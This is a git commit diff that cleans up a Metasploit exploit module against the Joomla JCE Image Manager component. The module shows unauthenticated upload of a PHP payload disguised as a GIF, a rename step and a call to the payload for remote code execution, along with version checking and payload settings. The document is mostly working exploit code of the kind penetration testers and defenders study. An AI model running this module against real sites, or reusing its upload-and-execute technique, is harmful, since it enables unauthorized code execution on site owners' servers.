cleanup for joomla_comjce_imgmanager

unstable
jvazquez-r7 2013-03-26 12:02:39 +01:00
parent 9b3bbd577f
commit 1d95abc458
1 changed files with 28 additions and 28 deletions

View File

@ -15,32 +15,33 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Code Execution', 'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla! This module exploits a vulnerability in the JCE component for Joomla!, which
could allow a unauthenticated remote attacker to upload arbitrary files, could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
caused by the fails to sufficiently sanitize user-supplied input. fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
Sending a specially-crafted HTTP request, a remote attacker could exploit request, a remote attacker could exploit this vulnerability to upload a malicious PHP
this vulnerability to upload a malicious PHP script, which could allow the script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
attacker to execute arbitrary PHP code on the vulnerable system. system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
}, },
'Author' => [ 'Heyder Andrade <eu[at]heyderandrade.org>' ], 'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['BID', '49338'], ['BID', '49338'],
['EDB', '17734'], ['EDB', '17734']
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long) 'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true, 'DisableNops' => true,
'BadChars' => "#", 'BadChars' => "#",
'Keys' => ['php'], 'Keys' => ['php']
'Compat' =>
{
'ConnectionType' => 'find',
},
}, },
'Platform' => 'php', 'Platform' => 'php',
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
@ -66,15 +67,14 @@ class Metasploit3 < Msf::Exploit::Remote
'file' => 'imgmanager' 'file' => 'imgmanager'
} }
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi( res = send_request_cgi({
{
'uri' => @uri_base, 'uri' => @uri_base,
'vars_get' => @vars_get_base, 'vars_get' => @vars_get_base,
'method' => 'GET', 'method' => 'GET',
'version' => '1.1' 'version' => '1.1'
}) })
version = nil
if (res and res.code == 200) if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<}) res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1 version = $1.nil? ? nil : $1
@ -171,7 +171,6 @@ class Metasploit3 < Msf::Exploit::Remote
payload = "#{@payload_name}.php" payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}") print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload) uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
register_files_for_cleanup(payload)
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'GET', 'method' => 'GET',
@ -186,6 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote
return if not check == Exploit::CheckCode::Vulnerable return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success if upload_gif == :success
if renamed? if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload call_payload
end end
end end